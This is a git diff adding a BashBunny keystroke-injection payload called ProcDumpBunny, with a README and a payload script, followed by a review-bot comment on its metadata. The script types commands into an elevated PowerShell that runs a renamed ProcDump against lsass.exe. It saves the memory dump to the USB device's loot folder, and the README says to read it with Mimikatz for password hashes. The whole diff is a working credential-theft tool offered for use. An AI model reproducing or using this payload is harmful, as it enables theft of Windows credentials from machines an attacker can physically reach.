diff --git a/payloads/library/credentials/ProcDumpBunny/README.md b/payloads/library/credentials/ProcDumpBunny/README.md
new file mode 100644
index 00000000..31b9ef73
--- /dev/null
+++ b/payloads/library/credentials/ProcDumpBunny/README.md
@@ -0,0 +1,21 @@
+**Title: ProcDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+What is ProcDumpBunny?
+#
+*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
+#
+
+**Instruction:**
+
+Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
+Place Bunny.exe in the same payload switch as your payload
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
+#
+Plug in BashBunny.
+Exfiltrate the out.dmp file and read it with Mimikatz.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
diff --git a/payloads/library/credentials/ProcDumpBunny/Screenshot (37).png b/payloads/library/credentials/ProcDumpBunny/Screenshot (37).png
new file mode 100644
index 00000000..37126293
Binary files /dev/null and b/payloads/library/credentials/ProcDumpBunny/Screenshot (37).png differ
diff --git a/payloads/library/credentials/ProcDumpBunny/Screenshot (38).png b/payloads/library/credentials/ProcDumpBunny/Screenshot (38).png
new file mode 100644
index 00000000..990830a9
Binary files /dev/null and b/payloads/library/credentials/ProcDumpBunny/Screenshot (38).png differ
diff --git a/payloads/library/credentials/ProcDumpBunny/Screenshot (39).png b/payloads/library/credentials/ProcDumpBunny/Screenshot (39).png
new file mode 100644
index 00000000..e8e4be20
Binary files /dev/null and b/payloads/library/credentials/ProcDumpBunny/Screenshot (39).png differ
diff --git a/payloads/library/credentials/ProcDumpBunny/payload.txt b/payloads/library/credentials/ProcDumpBunny/payload.txt
new file mode 100644
index 00000000..b0275b7e
--- /dev/null
+++ b/payloads/library/credentials/ProcDumpBunny/payload.txt
@@ -0,0 +1,45 @@
+#!/bin/bash
+#
+# Title: ProcDumpBunny
+# Description: Dump lsass.exe with a renamed version of procdump
+# Author: 0iphor13
+# Version: 1.0
+# Category: Credentials
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+#After you have adapted the delays for your target, add "-W hidden"
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+#Depending on your language - you need to change this - english layout: "Q ALT y" for example
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
+Q DELAY 250
+Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH
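Review bot: The header block (`# Title:` … `# Attackmodes:`) records the mechanism but not the on-disk footprint, and the footprint is only recoverable by reassembling the four `Q STRING` fragments: `out.dmp` is written into the elevated PowerShell's working directory, then moved to `\loot` on the BashBunny volume, and an empty `DONE` marker file is created at the volume root before the eject. A header line such as `# Artifacts: out.dmp (target cwd, moved to <BashBunny>\loot); DONE marker at volume root` would put that where the rest of the metadata lives, which is what an incident responder or reviewer reading this payload needs first. The split of one PowerShell statement across `Q STRING` lines also deserves a one-line comment above the first fragment stating that the fragments concatenate into a single command, since the break at `'l` / `abel=` otherwise reads as a typo.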